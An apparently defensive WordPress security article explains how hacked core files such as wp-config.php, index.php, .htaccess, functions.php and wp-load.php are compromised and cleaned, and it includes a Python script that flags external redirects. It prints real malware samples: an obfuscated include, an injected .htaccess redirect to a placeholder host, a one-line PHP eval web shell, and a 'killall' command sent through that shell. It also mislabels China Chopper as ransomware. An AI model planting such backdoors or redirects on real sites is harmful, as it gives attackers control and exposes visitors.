How to Scan & Fix WordPress Files that are Infected?

Fix wp-load php hacked, wp-config php hack, index php wp hacked, exploit wp-config PHP, wp-blog header php .

WordPress has made it super simple to create websites and has encouraged people to have an online presence from all sorts of backgrounds.

Taking care of your WordPress protection is necessary when creating your own website. One morning, the last thing you want to do is wake up to see your website hacked and all your growth and SEO efforts down the drain.

Because of its success, along with its themes & plugins, hackers tend to hit WordPress. If they discover a flaw in one plugin, nearly all the websites with that plugin enabled could easily be abused.


As an example, take the recent vulnerabilities in Elementor & Ultimate Addons. It is estimated that since the vulnerability came to light, over 1 million websites using Elementor Pro and 110,000 sites with Ultimate Addons were left exposed. The faults in the plugins allowed authorised users to upload arbitrary files, leading to Remote Code Execution (RCE) on the website. With this, hackers have been able to obtain and retain complete access to WordPress.

Likewise, in the ‘Slider Revolution’ plugin, there was an LFI vulnerability which made it possible for hackers to download wp-config.php from the insecure WordPress pages. This resulted in a leak of database details, encryption keys, and other confidential information about a website setup. This was previously known as the wp-config.php hack.

In this document, we’ll talk about all the essential files and locations that might have been hit by hackers & malware on your WordPress account.

1) WordPress Hack wp-config.php

For a WP installation, wp-config.php is an essential file. It is the configuration file that serves as the interface between the database and the WP file system. The file wp-config.php contains sensitive material, such as:

  • Host database
  • Password, username, & port number
  • Name of the Database
  • Keys to protection for WordPress
  • Prefix for Database Table

It’s a common target among hackers due to its critical nature. A crucial bug was discovered in November 2016 in the Slider Revolution plugin. If hackers get hold of the database login information through the wp-config.php exploit, they attempt to connect to the database and create fake WP admin accounts for themselves.

This was an LFI (Local File Inclusion) vulnerability that enabled hackers to download the wp-config file, giving them direct access to the website and its database. The hacker is exposed to confidential data such as user credentials, email IDs, directories, photos, transaction information from WooCommerce, and so on. They can also install scripts, such as the Filesman backdoor, to maintain continued access to the WordPress site.

2) Index.php of WordPress Hacked

The index.php file is the entry point for every WordPress website. Since it runs on every page of your site, hackers insert malicious code into it that affects your entire website.

For instance, the pub2srv malware and the Favicon malware hack target index.php files. This widely distributed malware redirection campaign was tracked by researchers at Astra Security, who found that malicious code such as @include “\x2f/sgb\x2ffavi\x63on_5\x34e6ed\x2eico” was added to index.php files, along with the code in the screenshot below:


[Screenshot: malicious code inserted in the index.php file of a WordPress installation]

The index.php file was later changed to index.php.bak by some ransomware activities, forcing the website to crash and not load at all.

Such malicious code in the index.php file can cause website visitors to see odd popups or adverts, or even be routed to other spam pages. To repair such a hack, compare the contents of this file with the original copy published by WordPress.

3) File Hacked for WordPress .htaccess

The .htaccess file, often found in the home location of your WordPress website, helps configure the server settings as required by the website. This is often found in servers running on Apache. The .htaccess file is a very strong component for controlling the performance and behaviour of your web server. It can also be used to control your website’s security. The following are some common uses of the .htaccess file:

  • Restrict access to certain site folders
  • Configure the site’s maximum memory usage
  • Build Redirects
  • HTTPS Control
  • Caching Administration
  • Preventing a few attacks by script injection
  • Maximum File Upload Sizes Control
  • Stop bots from being able to find usernames
  • Hotlinking Block Image
  • Control automated file downloads
  • Administrate file extensions

However, when a site is compromised these same capabilities can be abused to harvest clicks for the attacker. The .htaccess file is often injected with malicious code to redirect users, and it is frequently used to show spam to visitors. For example, look at the code provided below:

RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .**$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .**$ [NC,OR]
RewriteCond %{HTTP_REFERER} .**$ [NC,OR]
RewriteCond %{HTTP_REFERER} .**$ [NC,OR]
RewriteCond %{HTTP_REFERER} .**$ [NC,OR]
RewriteCond %{HTTP_REFERER} .**$ [NC,OR]
RewriteCond %{HTTP_REFERER} .**$ [NC,OR]
RewriteCond %{HTTP_REFERER} .**$ [NC]
RewriteRule .* http://MaliciousDomain.tld/bad.php?t=3 [R,L]

In the last line, the malicious code redirects user traffic away from the site: users are sent to http://MaliciousDomain.tld, where the bad.php script is then loaded. If you notice unusual redirects from your site, an .htaccess file hack is one possible cause. If you don’t find the file, however, or if it’s empty, don’t panic, as this file is not mandatory (unless you use pretty WordPress URLs).
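A practical way to catch the pattern above is to read the .htaccess file and list every RewriteRule whose target is an absolute URL on a host other than your own, together with the RewriteCond lines that gate it (a referer-gated rule that only fires for visitors arriving from search engines is the classic sign). The following Python checker is an added example, not code from the article, from Astra Security or from WordPress; the SAMPLE_HTACCESS text is constructed for the example, and MaliciousDomain.tld is a placeholder host.

```python
"""Flag .htaccess rewrite rules that send visitors to an external host.

Added example for this article (not code from the article or from WordPress):
reads an .htaccess file, tracks the RewriteCond lines attached to each
RewriteRule, and reports any rule whose target is an absolute URL on a host
other than the site's own. SAMPLE_HTACCESS is constructed for the example.
"""
import re
from urllib.parse import urlparse

# Constructed sample: the standard WordPress block followed by an injected
# referer-conditioned redirect of the kind shown in the article.
SAMPLE_HTACCESS = """\
# BEGIN WordPress
RewriteEngine On
RewriteBase /
RewriteRule ^index\\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule . /index.php [L]
# END WordPress
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.*$ [NC]
RewriteRule .* http://MaliciousDomain.tld/bad.php?t=3 [R,L]
"""

COND_RE = re.compile(r"^RewriteCond\s+(\S+)\s+(\S+)(?:\s+\[([^\]]*)\])?", re.I)
RULE_RE = re.compile(r"^RewriteRule\s+(\S+)\s+(\S+)(?:\s+\[([^\]]*)\])?", re.I)


def find_external_redirects(htaccess_text, site_host):
    """Return one finding per RewriteRule whose target lives on another host.

    Each finding records the line number, the target URL, its host, the
    RewriteCond test strings that gate the rule, whether any of those
    conditions looks at the referer, and whether the rule carries an
    explicit R (redirect) flag.
    """
    findings = []
    pending_conds = []  # RewriteCond lines apply only to the next RewriteRule
    for lineno, raw in enumerate(htaccess_text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        cond = COND_RE.match(line)
        if cond:
            pending_conds.append(cond.group(1))
            continue
        rule = RULE_RE.match(line)
        if not rule:
            continue
        target = rule.group(2)
        flags = [x.strip().upper() for x in (rule.group(3) or "").split(",") if x.strip()]
        # Only absolute URLs can point off-site; relative targets stay local.
        host = urlparse(target).hostname if "://" in target else None
        if host and host != site_host.lower():
            findings.append({
                "line": lineno,
                "target": target,
                "host": host,
                "conditions": list(pending_conds),
                "referer_gated": any("HTTP_REFERER" in c.upper() for c in pending_conds),
                "explicit_redirect": any(x == "R" or x.startswith("R=") for x in flags),
            })
        pending_conds = []  # a RewriteRule consumes the conditions before it
    return findings


def report(htaccess_text, site_host):
    """Human-readable summary, one line per finding."""
    lines = []
    for f in find_external_redirects(htaccess_text, site_host):
        gate = "referer-gated " if f["referer_gated"] else ""
        lines.append(f"line {f['line']}: {gate}redirect to {f['host']} ({f['target']})")
    return lines


if __name__ == "__main__":
    for line in report(SAMPLE_HTACCESS, "example.com"):
        print(line)
```

Run it against your real file by reading it into `find_external_redirects` with your own hostname; the relative `/index.php` rule from the stock WordPress block is left alone, and only the injected rule on line 11 of the sample is reported. A legitimate redirect to a domain you own will also show up, so treat the output as a review list rather than a verdict.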

4) WordPress footer.php & header.php (Files Hacked by WordPress Theme)

There is a file called footer.php and header.php for each WordPress theme, which has the footer and header code for the site. Scripts & certain widgets that remain the same throughout the website are included in this area. The share widget or the social media widgets at the bottom of your website, for instance. Or it could sometimes be just copyright info, credits, etc.

These two files are therefore critical files for attackers to target. They are often used to redirect visitors to malware and display spam content, as was the case with the digestcolect[.com] redirect malware.

Some of this was decoded and hackers were found leveraging browser cookies to identify users and show them malicious ads, etc.

In addition, the attackers injected JavaScript codes into all files with an extension of .js in another instance. Because of the large-scale infection, such hacks often become hard to clean.

5) WordPress functions.php Hacked

In the theme folder, the functions file acts much like a plugin, which means it can be used to add extra features and functionality to the WordPress site. The file functions.php can be used for:

  • Calling WordPress events / functions
  • Calling PHP’s native functions
  • Defining functions of your own

The functions.php file is present in every theme, but it is important to remember that only one functions.php file runs at any given moment: the one in the active theme. Because of this, attackers deliberately targeted functions.php files in the Wp-VCD backdoor exploit. This malware created new administrators and injected spam pages, such as Pharma and Japanese SEO spam, on the site.

<?php if (file_exists(dirname(__FILE__) . '/class.theme-modules.php')) include_once(dirname(__FILE__) . '/class.theme-modules.php'); ?>

As the code above shows, this includes the file class.theme-modules.php. That file is then used (even if the theme is disabled) to inject malware into other themes installed on your site, creating new users and backdoors. This allowed attackers to access the site even after the functions.php file was cleaned up.

6) wp-load.php hacked

What is the wp-load WordPress Malware?

If you see unfamiliar files in your WordPress site’s web root, such as wp-load-eFtAh.php, it’s possible that your site has been hacked. There is only one line of code in these files that is harmful in nature. This code acts as a backdoor, allowing hackers to run PHP code, run system commands, and connect to the WordPress database, among other things.

Because typical malware scanners frequently fail to detect such files, this technique is widely used.

Common File Names of wp-load.php hack 

  • wp-load-eFtAh.php
  • wp-load-qPrOj.php
  • wp-load-sJgKb.php

wp-load.php is an important file for a WordPress installation. It bootstraps the WordPress environment and gives plugins access to the core functionality of native WP. As seen in the case of the China Chopper web shell ransomware, many malware variants infect WordPress sites by creating malicious wp-load files. The usual pattern was the creation on the server of files like wp-load-eFtAh.php. As the name closely matches the original file, you would not have found it odd when signed in over FTP. Those files might contain code such as:

Code sample from a hacked wp-load file:

<?php /*5b7bdc250b181*/ ?><?php @eval($_POST['pass']);?>

This code lets the intruder execute any PHP code submitted in the pass parameter, so harmful instructions can be run through this loophole. For example, a request to http://yoursite/your.php with pass=system(“killall -9 apache”) may kill the web server processes, which would take the whole server down. Do not judge this code by its length: it is dangerous enough to give remote control of your server.

How to Fix the wp-load.php hacked file (DIY)?

  1. Delete the wp-load-*.php files that are harmful.
  2. Examine complete WordPress core files, plugins, and themes to check whether the hacker has modified any of them.
  3. Look for any unrecognised WordPress admin users who have been added to the server.
  4. Look for any web shells on the servers.

That’s it, you have removed the wp-load PHP hacked files!

7) Flood of class-wp-cache.php Server files

In one of the recent hacks, we’ve seen cPanel and the entire web server fill up with thousands or even millions of class-wp-cache.php files. These malicious files are dropped into every folder of the website, including the core directories. The source of this infection is typically a loophole in the website code that opens up an entry point for hackers.